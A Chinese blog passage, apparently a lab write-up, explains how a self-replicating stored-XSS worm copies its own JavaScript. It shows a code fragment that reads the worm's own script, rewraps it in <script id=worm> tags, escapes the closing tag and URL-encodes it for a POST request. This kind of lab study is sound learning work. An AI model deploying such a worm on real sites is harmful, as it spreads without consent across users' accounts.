通过源代码查看,我们也能初见端倪。

其原版的JavaScript代码

image-20220316231224328

复制出的蠕虫的JavaScript代码

image-20220316231002008

脚本渊源

既然要自我复制,就像现实中生活的病毒,每个复制出的病原体都会带上自己的RNA/DNA,Worm复制时也要带上自己的遗传信息,正是通过此句 scriptValue = document.getElementById("worm");获得了自己的遗传信息,再通过一些加工,跨过网页编码的一些特性。

本次使用的脚本耗时良久,由于虚拟机内差劲的配置,采取的方式是先在物理机上进行测试,测试方式就是将那一段代码先放进一个HTML文件中,再使用浏览器开始调试。

中途历经多次调试。大家在自己测试时也可以先在顺手的浏览器上测试一下,可以避免一些失误。

image-20220316225117500

小插曲

此段是也是一个重要的地方,我们要给其写入的内容加上<script id=worm>

var sc1 = "<script id=worm>";
  var sc12 = sc1.concat(scriptValue);
  scriptValue = sc12.concat("<\/script>");
  scriptValue = escape(scriptValue);

这也是通过对复制出的页面源代码进行分析发现的,与之一同发现的还有不断增加的<br/>换行符。这也是其复制时又额外加上的。

image-20220316225555953

而原版的源代码没有那么多换行符。也正因此,在后续的修改中直接删除了所有的换行。

image-20220316225856485

sc12.concat("<\/script>") 我们将字符串的 / 进行转义,如果我们直接放置整个字符串,Firefox的HTML解析器会将该字符串视为脚本块的结束标记,其余的代码将被忽略。或者我们也可以使用"</" + "script>"

escape(scriptValue);在HTTP POST请求中,数据以“application/x-www-form-urlencoded”的内容类型发送。我们使用escape()函数对字符串进行编码。这也是不能使用+的原因,否则复制出的代码原本的+会被空格取代、。

posted @ 2022-03-16 14:17  SKPrimin  阅读(828)  评论(0编辑  收藏  举报